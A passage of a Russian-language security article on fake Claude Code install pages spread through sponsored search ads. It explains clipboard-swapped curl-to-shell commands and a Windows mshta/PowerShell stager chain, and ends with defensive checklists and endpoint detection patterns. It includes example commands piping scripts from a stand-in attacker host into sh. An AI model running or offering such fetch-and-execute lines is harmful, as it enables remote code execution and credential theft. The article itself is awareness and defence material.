\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044e:\u043b\u043e\u0433\u043e\u0442\u0438\u043f;sidebar;quickstart;tabs \u0434\u043b\u044f macOS\/Linux\/Windows;\u043a\u043d\u043e\u043f\u043a\u0430 Copy;\u043a\u043e\u0440\u043e\u0442\u043a\u0430\u044f install-\u043a\u043e\u043c\u0430\u043d\u0434\u0430.\u041d\u0430 \u044d\u043a\u0440\u0430\u043d\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0432\u0438\u0434\u0438\u0442 \u0447\u0442\u043e-\u0442\u043e \u0432\u0440\u043e\u0434\u0435:curl -fsSL https:\/\/claude.ai\/install.sh | sh\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0432\u0438\u0434\u0438\u043c\u0430\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0438 \u043a\u043e\u043c\u0430\u043d\u0434\u0430, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0440\u0435\u0430\u043b\u044c\u043d\u043e \u043f\u043e\u043f\u0430\u0434\u0430\u0435\u0442 \u0432 clipboard, \u043d\u0435 \u043e\u0431\u044f\u0437\u0430\u043d\u044b \u0441\u043e\u0432\u043f\u0430\u0434\u0430\u0442\u044c.\u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043f\u043e\u043a\u0430\u0437\u0430\u043d\u043e:curl -fsSL https:\/\/claude.ai\/install.sh | sh\u0410 \u043f\u043e\u0441\u043b\u0435 \u043d\u0430\u0436\u0430\u0442\u0438\u044f Copy \u0432 clipboard \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043f\u0430\u0441\u0442\u044c:curl -fsSL https:\/\/download.example.invalid\/install.sh | sh\u0418\u043b\u0438 \u0435\u0449\u0435 \u0445\u0443\u0436\u0435:curl -fsSL https:\/\/download.example.invalid\/bootstrap | sh\u0412 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u0435 \u0434\u043e\u043c\u0435\u043d, \u043a\u043e\u043d\u0435\u0447\u043d\u043e, \u0431\u0443\u0434\u0435\u0442 \u0432\u044b\u0433\u043b\u044f\u0434\u0435\u0442\u044c \u0431\u043e\u043b\u0435\u0435 \u043f\u0440\u0430\u0432\u0434\u043e\u043f\u043e\u0434\u043e\u0431\u043d\u043e.\u0421\u0443\u0442\u044c \u043d\u0435 \u0432 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u043c URL.\u0421\u0443\u0442\u044c \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0434\u043e\u0432\u0435\u0440\u044f\u0435\u0442 UI \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b, \u0430 \u043d\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u043f\u0435\u0440\u0435\u0434 \u0437\u0430\u043f\u0443\u0441\u043a\u043e\u043c.\u0413\u0434\u0435 \u0437\u0434\u0435\u0441\u044c JavaScript\u0412 web-\u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u043e\u0431\u044b\u0447\u043d\u043e \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u0442\u0435\u043a\u0441\u0442 \u0438 \u0440\u044f\u0434\u043e\u043c \u043b\u0435\u0436\u0438\u0442 \u043a\u043d\u043e\u043f\u043a\u0430 Copy.\u042d\u0442\u0430 \u043a\u043d\u043e\u043f\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043d\u0435 \u0442\u043e, \u0447\u0442\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0432\u0438\u0434\u0438\u0442 \u0433\u043b\u0430\u0437\u0430\u043c\u0438.\u0423\u0441\u043b\u043e\u0432\u043d\u043e:visible text:  curl -fsSL https:\/\/official.example\/install.sh | shclipboard value:  curl -fsSL https:\/\/attacker.example\/install.sh | sh\u041c\u043e\u0436\u043d\u043e \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u0438 \u0442\u043e\u043d\u044c\u0448\u0435:\u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0442\u044c \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u0434\u043e\u043c\u0435\u043d \u0432 UI;\u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u0442\u044c attacker-controlled URL;\u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0442\u044c base64-decoding;\u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0442\u044c silent flags;\u0432\u044b\u0431\u0438\u0440\u0430\u0442\u044c payload \u043f\u043e\u0434 OS;\u043f\u043e\u0434\u043c\u0435\u043d\u044f\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438\u0437 \u043d\u0443\u0436\u043d\u043e\u0439 \u0441\u0442\u0440\u0430\u043d\u044b \u0438\u043b\u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438;\u043c\u0435\u043d\u044f\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u0440\u0438 \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0435 \u0438\u0437 ad campaign.\u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u201c\u044f \u0436\u0435 \u0432\u0438\u0434\u0435\u043b \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u043d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435\u201d \u043d\u0435 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0433\u0430\u0440\u0430\u043d\u0442\u0438\u0435\u0439.\u0413\u0430\u0440\u0430\u043d\u0442\u0438\u044f \u043f\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u043a\u043e\u0433\u0434\u0430 \u0447\u0435\u043b\u043e\u0432\u0435\u043a \u0441\u043c\u043e\u0442\u0440\u0438\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0443\u0436\u0435 \u043f\u043e\u0441\u043b\u0435 paste, \u0434\u043e Enter.\u0414\u0430, \u044d\u0442\u043e \u0431\u0430\u043d\u0430\u043b\u044c\u043d\u043e.\u041d\u043e \u0438\u043c\u0435\u043d\u043d\u043e \u0442\u0430\u043a\u0438\u0435 \u0431\u0430\u043d\u0430\u043b\u044c\u043d\u044b\u0435 \u0432\u0435\u0449\u0438 \u0447\u0430\u0449\u0435 \u0432\u0441\u0435\u0433\u043e \u0438 \u043b\u043e\u043c\u0430\u044e\u0442\u0441\u044f.Windows-\u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439: mshta \u0438 PowerShell\u0412 Windows-\u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0430\u0445 \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0439 \u0447\u0430\u0441\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f living-off-the-land binaries.\u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0446\u0435\u043f\u043e\u0447\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u0432\u044b\u0433\u043b\u044f\u0434\u0435\u0442\u044c \u0442\u0430\u043a:browser \/ user paste  -&gt; PowerShell  -&gt; mshta.exe  -&gt; remote HTA\/script  -&gt; cmd.exe \/ powershell stager  -&gt; fileless payload  -&gt; persistence \/ credential theft\u0412 \u043e\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f\u0445 \u0432\u043e\u043a\u0440\u0443\u0433 Claude Code \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0438 mshta.exe, PowerShell, staged execution, obfuscation, AMSI bypass attempts, browser data theft \u0438 infostealer behavior.\u0417\u0434\u0435\u0441\u044c \u0432\u0430\u0436\u043d\u043e \u043f\u043e\u043d\u0438\u043c\u0430\u0442\u044c: \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u043d\u0435 \u043e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u0442\u044c setup.exe.\u041e\u043d \u043c\u043e\u0436\u0435\u0442 \u0441\u0430\u043c \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u0443, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0434\u0442\u044f\u043d\u0435\u0442 \u0432\u0441\u0435 \u043e\u0441\u0442\u0430\u043b\u044c\u043d\u043e\u0435.\u0418 \u0441 \u0442\u043e\u0447\u043a\u0438 \u0437\u0440\u0435\u043d\u0438\u044f \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 security controls \u044d\u0442\u043e \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043d\u0435 \u043a\u0430\u043a \u201c\u0444\u0430\u0439\u043b \u0438\u0437 \u043f\u043e\u0447\u0442\u044b\u201d, \u0430 \u043a\u0430\u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0430\u044f terminal activity.macOS\/Linux-\u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439: curl-to-shell\u041d\u0430 macOS\/Linux \u043f\u0440\u0438\u0432\u044b\u0447\u043d\u044b\u0439 \u043f\u0430\u0442\u0442\u0435\u0440\u043d \u0434\u0440\u0443\u0433\u043e\u0439:curl -fsSL https:\/\/example.com\/install.sh | sh\u0438\u043b\u0438:curl -fsSL https:\/\/example.com\/install.sh | zsh\u042d\u0442\u043e \u0443\u0434\u043e\u0431\u043d\u043e.\u0418 \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043e\u043f\u0430\u0441\u043d\u043e.\u0422\u0430\u043a\u0430\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0433\u043e\u0432\u043e\u0440\u0438\u0442:\u0441\u043a\u0430\u0447\u0430\u0439 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 script \u0438 \u0441\u0440\u0430\u0437\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0438 \u0435\u0433\u043e\u0415\u0441\u043b\u0438 \u0434\u043e\u043c\u0435\u043d \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u0438 script \u043e\u0436\u0438\u0434\u0430\u0435\u043c\u044b\u0439, \u044d\u0442\u043e \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0439 developer workflow.\u0415\u0441\u043b\u0438 \u0434\u043e\u043c\u0435\u043d \u043f\u043e\u0434\u043c\u0435\u043d\u0435\u043d, \u044d\u0442\u043e remote code execution \u0440\u0443\u043a\u0430\u043c\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f.\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043d\u0435 \u0432 curl.\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e trust boundary \u043f\u0440\u0435\u0432\u0440\u0430\u0449\u0430\u0435\u0442\u0441\u044f \u0432:\u044f \u0434\u043e\u0432\u0435\u0440\u044f\u044e \u044d\u0442\u043e\u0439 web-\u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 \u0438 \u0435\u0435 copy button\u0410 \u044d\u0442\u043e \u0441\u043b\u0430\u0431\u0430\u044f \u0433\u0440\u0430\u043d\u0438\u0446\u0430.\u041f\u043e\u0447\u0435\u043c\u0443 sponsored result \u043e\u043f\u0430\u0441\u043d\u0435\u0435, \u0447\u0435\u043c \u043a\u0430\u0436\u0435\u0442\u0441\u044f\u041c\u043d\u043e\u0433\u0438\u0435 \u043b\u044e\u0434\u0438 \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u0432\u043e\u0441\u043f\u0440\u0438\u043d\u0438\u043c\u0430\u044e\u0442 Google Ads \u043a\u0430\u043a \u0447\u0442\u043e-\u0442\u043e \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u043e\u0435.\u041b\u043e\u0433\u0438\u043a\u0430 \u0442\u0430\u043a\u0430\u044f:\u0435\u0441\u043b\u0438 \u0441\u0441\u044b\u043b\u043a\u0430 \u0432\u0432\u0435\u0440\u0445\u0443 Google, \u043d\u0430\u0432\u0435\u0440\u043d\u043e\u0435, \u044d\u0442\u043e \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u044b\u0439 \u0441\u0430\u0439\u0442\u042d\u0442\u043e \u043f\u043b\u043e\u0445\u0430\u044f \u044d\u0432\u0440\u0438\u0441\u0442\u0438\u043a\u0430.Malvertising \u043a\u0430\u043a \u0440\u0430\u0437 \u0438 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043f\u043e\u0442\u043e\u043c\u0443, \u0447\u0442\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0441\u0430\u043c \u0438\u0449\u0435\u0442 \u043d\u0443\u0436\u043d\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442. \u041d\u0435\u0442 phishing email. \u041d\u0435\u0442 \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u044f. \u041d\u0435\u0442 \u0441\u0442\u0440\u0430\u043d\u043d\u043e\u0433\u043e \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u0432 \u043c\u0435\u0441\u0441\u0435\u043d\u0434\u0436\u0435\u0440\u0435.\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0438\u043d\u0438\u0446\u0438\u0438\u0440\u043e\u0432\u0430\u043b \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0435 \u0441\u0430\u043c.\u0418 \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043f\u0441\u0438\u0445\u043e\u043b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u0438 \u043c\u0435\u043d\u044c\u0448\u0435 \u043d\u0430\u0441\u0442\u043e\u0440\u043e\u0436\u0435\u043d.Push Security \u043e\u0442\u043c\u0435\u0447\u0430\u043b\u0438, \u0447\u0442\u043e fake install pages \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u043b\u0438\u0441\u044c \u0447\u0435\u0440\u0435\u0437 sponsored search results \u043f\u043e \u0437\u0430\u043f\u0440\u043e\u0441\u0430\u043c \u0432\u0440\u043e\u0434\u0435 Claude Code, Claude Code install, Claude Code CLI. Kaspersky \u0442\u043e\u0436\u0435 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u043b similar flow: \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0438\u0449\u0435\u0442 Claude Code download, \u0432\u0438\u0434\u0438\u0442 sponsored link \u0438 \u043f\u043e\u043f\u0430\u0434\u0430\u0435\u0442 \u043d\u0430 fake documentation.\u0414\u043b\u044f \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0439 \u0441\u0440\u0435\u0434\u044b \u044d\u0442\u043e \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u043d\u0435\u043f\u0440\u0438\u044f\u0442\u043d\u043e.\u041f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e employee \u043c\u043e\u0436\u0435\u0442 \u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043d\u0430 \u0440\u0430\u0431\u043e\u0447\u0443\u044e \u043c\u0430\u0448\u0438\u043d\u0443, \u0433\u0434\u0435 \u0435\u0441\u0442\u044c:source code;SSH keys;browser sessions;password manager session;Git credentials;cloud CLI tokens;kubeconfig;CI\/CD access;internal docs;VPN access.Infostealer \u043d\u0430 \u0442\u0430\u043a\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u2014 \u044d\u0442\u043e \u0443\u0436\u0435 \u043d\u0435 \u043f\u0440\u043e\u0441\u0442\u043e \u201c\u043b\u0438\u0447\u043d\u044b\u0439 \u043d\u043e\u0443\u0442\u0431\u0443\u043a \u0437\u0430\u0440\u0430\u0437\u0438\u043b\u0441\u044f\u201d.\u042d\u0442\u043e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0439 \u0432\u0445\u043e\u0434 \u0432 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044e.\u0427\u0435\u043c \u044d\u0442\u043e \u043e\u0442\u043b\u0438\u0447\u0430\u0435\u0442\u0441\u044f \u043e\u0442 \u043e\u0431\u044b\u0447\u043d\u043e\u0433\u043e fake installer\u041a\u043b\u0430\u0441\u0441\u0438\u0447\u0435\u0441\u043a\u0438\u0439 fake installer \u0447\u0430\u0441\u0442\u043e \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0442\u0430\u043a:\u0441\u043a\u0430\u0447\u0430\u0439\u0442\u0435 setup.exe\u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u0435 installer\u043f\u043e\u043b\u0443\u0447\u0438\u0442\u0435 malwareInstallFix \u0442\u043e\u043d\u044c\u0448\u0435.\u041e\u043d \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u0443\u044e developer-\u043f\u0440\u0438\u0432\u044b\u0447\u043a\u0443:\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f \u0433\u043e\u0432\u043e\u0440\u0438\u0442 \u0441\u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u0443\u044f \u043a\u043e\u043f\u0438\u0440\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443\u0414\u043b\u044f \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430 \u044d\u0442\u043e \u043d\u0435 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043a\u0430\u043a \u201c\u044f \u0441\u043a\u0430\u0447\u0430\u043b \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 exe\u201d.\u042d\u0442\u043e \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043a\u0430\u043a \u201c\u044f \u043f\u043e\u0441\u0442\u0430\u0432\u0438\u043b CLI tool \u043f\u043e \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438\u201d.\u041f\u043e\u044d\u0442\u043e\u043c\u0443 awareness \u0434\u043e\u043b\u0436\u0435\u043d \u0431\u044b\u0442\u044c \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u0440\u043e \u201c\u043d\u0435 \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0439\u0442\u0435 exe \u0438\u0437 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0430\u201d.\u041d\u0443\u0436\u043d\u043e \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e \u043f\u0440\u043e\u0433\u043e\u0432\u0430\u0440\u0438\u0432\u0430\u0442\u044c:terminal commands \u0438\u0437 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430 \u0442\u043e\u0436\u0435 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f code execution\u0427\u0442\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u043f\u0435\u0440\u0435\u0434 \u0437\u0430\u043f\u0443\u0441\u043a\u043e\u043c install-\u043a\u043e\u043c\u0430\u043d\u0434\u044b\u041c\u0438\u043d\u0438\u043c\u0430\u043b\u044c\u043d\u044b\u0439 checklist \u0434\u043b\u044f \u0447\u0435\u043b\u043e\u0432\u0435\u043a\u0430:\u041d\u0435 \u043a\u043b\u0438\u043a\u0430\u0442\u044c sponsored result \u0434\u043b\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 dev tools.\u041e\u0442\u043a\u0440\u044b\u0432\u0430\u0442\u044c official docs \u0438\u0437 known source.\u041f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u0434\u043e\u043c\u0435\u043d \u0432 \u0441\u0430\u043c\u043e\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u0435, \u0430 \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0432 address bar.\u041f\u043e\u0441\u043b\u0435 paste \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0434\u043e Enter.\u041d\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c curl | sh, \u0435\u0441\u043b\u0438 \u043d\u0435 \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e \u0438\u043c\u0435\u043d\u043d\u043e \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u0442\u0441\u044f.\u041f\u043e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u0441\u043a\u0430\u0447\u0430\u0442\u044c script \u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u044c \u0435\u0433\u043e:curl -fsSL https:\/\/official.example\/install.sh -o install.shless install.shsh install.sh\u0414\u043b\u044f \u0441\u043e\u043c\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 tools \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c disposable VM\/container.\u041d\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043d\u043e\u0432\u044b\u0435 AI tools \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0435 \u0441 production secrets.\u042d\u0442\u043e \u043d\u0435 \u0434\u043e\u043b\u0436\u043d\u043e \u043f\u0440\u0435\u0432\u0440\u0430\u0449\u0430\u0442\u044c\u0441\u044f \u0432 \u043f\u0430\u0440\u0430\u043d\u043e\u0439\u044e.\u041d\u043e \u0435\u0441\u043b\u0438 \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 remote script, \u044d\u0442\u043e \u0443\u0436\u0435 \u043f\u043e\u043b\u043d\u043e\u0446\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430.\u041a \u044d\u0442\u043e\u043c\u0443 \u043d\u0430\u0434\u043e \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u044c\u0441\u044f \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e.\u0427\u0442\u043e \u043c\u043e\u0436\u043d\u043e \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u043d\u0430 \u0443\u0440\u043e\u0432\u043d\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b\u041e\u0434\u043d\u043e\u0433\u043e awareness \u043c\u0430\u043b\u043e.\u042f \u0431\u044b \u0434\u043e\u0431\u0430\u0432\u0438\u043b \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 controls.Internal allowlist \u0434\u043b\u044f developer tools\u041a\u043e\u043c\u0430\u043d\u0434\u0430 \u0434\u043e\u043b\u0436\u043d\u0430 \u0437\u043d\u0430\u0442\u044c, \u043e\u0442\u043a\u0443\u0434\u0430 \u0441\u0442\u0430\u0432\u044f\u0442\u0441\u044f approved tools.\u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440:Claude Code:  official docs: https:\/\/docs.anthropic.com\/&#8230;  package: @anthropic-ai\/claude-codeNode:  official: https:\/\/nodejs.org\/  internal mirror: https:\/\/nexus.example.com\/&#8230;Homebrew:  official: https:\/\/brew.sh\/\u0415\u0441\u043b\u0438 \u0447\u0435\u043b\u043e\u0432\u0435\u043a \u043d\u0430\u0445\u043e\u0434\u0438\u0442 install guide \u0447\u0435\u0440\u0435\u0437 Google Ads, \u044d\u0442\u043e \u0443\u0436\u0435 \u043f\u043e\u0432\u043e\u0434 \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f.Internal docs\u0414\u043b\u044f \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0445 tools \u043b\u0443\u0447\u0448\u0435 \u0438\u043c\u0435\u0442\u044c \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u044e\u044e \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443:\u043a\u0430\u043a \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c\u043a\u0430\u043a\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u043a\u0430\u043a\u043e\u0439 \u0434\u043e\u043c\u0435\u043d \u043e\u0436\u0438\u0434\u0430\u0435\u0442\u0441\u044f\u043a\u0430\u043a\u043e\u0439 hash\/signature \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c\u043a\u0443\u0434\u0430 \u043f\u0438\u0441\u0430\u0442\u044c, \u0435\u0441\u043b\u0438 \u043d\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442\u042d\u0442\u043e \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u043e \u0434\u043b\u044f AI tools, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u043b\u044e\u0434\u0438 \u0432\u0441\u0435 \u0440\u0430\u0432\u043d\u043e \u0431\u0443\u0434\u0443\u0442 \u0438\u0445 \u043f\u0440\u043e\u0431\u043e\u0432\u0430\u0442\u044c.\u0415\u0441\u043b\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u043d\u0435 \u0434\u0430\u0435\u0442 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u0439 \u043f\u0443\u0442\u044c, \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u0438 \u043d\u0430\u0439\u0434\u0443\u0442 \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u0439.DNS\/SWG controls\u041c\u043e\u0436\u043d\u043e \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u0442\u044c:newly registered domains;suspicious lookalike domains;known malicious domains;ad-delivered installer pages;direct access \u043a suspicious payload hosts.\u042d\u0442\u043e \u043d\u0435 \u0441\u0435\u0440\u0435\u0431\u0440\u044f\u043d\u0430\u044f \u043f\u0443\u043b\u044f, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e attackers \u0431\u044b\u0441\u0442\u0440\u043e \u043c\u0435\u043d\u044f\u044e\u0442 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443.\u041d\u043e \u043a\u0430\u043a \u0441\u043b\u043e\u0439 \u0437\u0430\u0449\u0438\u0442\u044b \u043f\u043e\u043b\u0435\u0437\u043d\u043e.Endpoint detections\u041d\u0430 Windows \u044f \u0431\u044b \u0441\u043c\u043e\u0442\u0440\u0435\u043b \u043d\u0430 \u0442\u0430\u043a\u0438\u0435 behavioral patterns:browser -&gt; powershellbrowser -&gt; cmdpowershell -&gt; mshtamshta -&gt; cmdmshta -&gt; powershellpowershell -EncodedCommandPowerShell AMSI tamperingnew scheduled task near install activityunexpected outbound from scripting 